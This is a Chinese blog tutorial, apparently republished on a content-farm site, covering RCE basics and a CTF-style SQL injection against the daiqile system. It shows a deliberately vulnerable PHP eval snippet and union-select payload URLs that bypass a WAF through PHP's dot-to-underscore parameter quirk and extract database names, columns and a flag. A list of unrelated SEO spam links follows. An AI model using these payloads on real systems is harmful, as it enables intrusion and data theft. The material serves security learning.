当前位置: 首页 > news >正文

php网站怎么搭建环境配置seo在线优化工具 si

php网站怎么搭建环境配置,seo在线优化工具 si,利用网上菜谱做网站,wordpress美容养生目录 简述rce漏洞 可能产生rce漏洞的函数 RCE代码执行漏洞示例 贷齐乐系统多处SQL注入漏洞 ​编辑 爆出库名 爆出表名 爆出表下的列名 查flag数据 简述rce漏洞 ​ rce漏洞,即远程代码执行和远程命令执行漏洞。这种漏洞允许攻击者在后台服务器上远程注入操作…

目录

简述rce漏洞

可能产生rce漏洞的函数

RCE代码执行漏洞示例

贷齐乐系统多处SQL注入漏洞

​编辑

爆出库名

爆出表名

爆出表下的列名

查flag数据


简述rce漏洞

​ rce漏洞,即远程代码执行和远程命令执行漏洞。这种漏洞允许攻击者在后台服务器上远程注入操作系统命令或代码,从而控制后台系统。

可能产生rce漏洞的函数

1.PHP的system()和exec()函数:这些函数用于执行外部命令,如果未对用户输入进行适当的过滤或验证,攻击者可能利用这些函数执行任意命令。
2.PHP的eval()函数:该函数用于执行字符串作为PHP代码,如果未对用户输入进行适当的过滤或验证,攻击者可以利用此函数执行任意代码。
3.PHP的create_function()函数:该函数用于动态创建函数,如果未对用户输入进行适当的过滤或验证,攻击者可以利用此函数执行任意代码。

RCE代码执行漏洞示例

<?php$code=$_GET['x'];eval($code);
?>

访问刚刚创建的php文件,参数后面的内容写为“phpinfo()”.可以看到网页执行了phpinfo()语句并进行了回显。

访问刚刚创建的php文件,参数后面的内容写为“echo 123;”.可以看到网页执行了echo 123语句并进行了回显

贷齐乐系统多处SQL注入漏洞

该漏洞基于错误的WAF引发的,同SQLi靶场中的29关到31关类似,但该漏洞是错误的WAF引起的,而29关到31关则是HTTP参数污染引起的。还是有些不同之处的,而这里是HPP全局参数污染以及PHP的一个特性。

单引号闭合

爆出库名

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables&i.d=1&submit=1

爆出表名

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x637466/**/limit/**/0,1&i.d=1&submit=1

爆出表下的列名

http://127.0.0.1/daiqile/index.php/?&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273&i.d=1&submit=1

http://127.0.0.1/daiqile/index.php/?&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/0,1&i.d=1&submit=1

http://127.0.0.1/daiqile/index.php/?&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/3,1&i.d=1&submit=1

查flag数据

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,flag,3,4/**/from/**/ctf.users&i.d=1&submit=1

总结

PHP特性:在GET请求中,如果参数的键(key)包含点号(.),PHP会自动将其转换为下划线(_)。例如,参数i.d会被转换为i_d

http://www.dinnco.com/news/4784.html

相关文章:

  • 上海网站排名优化价格免费刷赞网站推广免费
  • 如何做视频类网站推广普通话手抄报句子
  • 如何选择一个优质网站建设公司数据营销
  • 一建建设网站东莞营销外包公司
  • 公司做的网站打开慢上海网站营销推广
  • 用win2008做网站网络推广的工作内容
  • 清新大气企业公司网站源码郑州seo学校
  • 珠海网站建设的公司排名求老哥给几个靠谱的网站
  • 不用fash做的视频网站seo排名优化是什么意思
  • 5g互联如何取消网站备案厨师培训机构
  • 上海工商网站手机搜索引擎排名
  • 郑州网站建设修改苏州seo关键词优化外包
  • wordpress大前端美化版成都搜狗seo
  • 高端做网站公司国内搜索引擎排行榜
  • 有哪些企业可以做招聘的网站有哪些方面seo需要付费吗
  • 政府网站开发建设方案网站底部友情链接代码
  • 在网站上使用特殊字体58同城发布免费广告
  • 做公司网站排名要怎么做网络推广
  • 网站备案填写网站名称百度关键词搜索怎么做
  • 网络营销策划书封面优化排名
  • 公司网站建设安全的风险2024年1月新冠高峰
  • 公司网站建设意见和建议如何快速推广
  • 宝山网站建设他达拉非片的作用及功效副作用
  • 沭阳各乡镇做网站软文是指什么
  • 如何做外围网站的代理深圳网络络推广培训
  • 邯郸做网站推广多少钱网络seo
  • 不用域名做自己的网站樱桃bt官网
  • 蓝田县建设局网站百度今日排行榜
  • 外包公司做网站多少市场推广方式有哪几种
  • 深圳网站设计招聘信息seo人员工作内容